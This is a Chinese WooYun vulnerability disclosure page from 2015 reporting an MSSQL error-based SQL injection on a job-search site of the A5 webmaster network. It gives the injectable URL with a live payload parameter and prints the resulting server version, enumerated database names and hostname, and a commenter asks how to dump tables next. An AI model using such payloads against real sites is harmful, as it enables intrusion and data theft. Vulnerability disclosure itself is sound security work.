当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115504

漏洞标题:A5站长网某站点MSSQL报错注入

相关厂商:A5站长网

漏洞作者: lijiejie

提交时间:2015-05-22 12:52

修复时间:2015-05-27 12:54

公开时间:2015-05-27 12:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

A5站长网某站点MSSQL报错注入,部分语法不可用

详细说明:

注射点:

http://job.admin5.com/Person/Per_Search.aspx?cvalid=(select db_name(0))&redate=180


可以用slect,可以用内置函数。

admin5.png

漏洞证明:

SQL Server:

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


从db_name(0)依次增大,得到所有数据库:

master
tempdb
model
msdb
Admin5Job
8516com
Advertisement
ChinaDat
SinvoCas
BaoXian
CityActivity


Select hostname():

ADMIN6-1SYNOU7N

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-27 12:54

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-22 13:41 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    李姐姐疯了?

  2. 2015-05-22 15:42 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    疯了咋的?

  3. 2015-05-22 16:39 | 小豹 ( 实习白帽子 | Rank:33 漏洞数:8 | 一个人的寂寞,整个群的错234236)

    李姐姐,你已经疯了

  4. 2015-05-27 05:45 | mó-wáng ( 路人 | Rank:2 漏洞数:2 | hello ,world !)

    cmstop?

  5. 2015-05-27 22:29 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    楼主大牛,接下来也是用select爆出对应数据库的表段和字段吗?新手求教。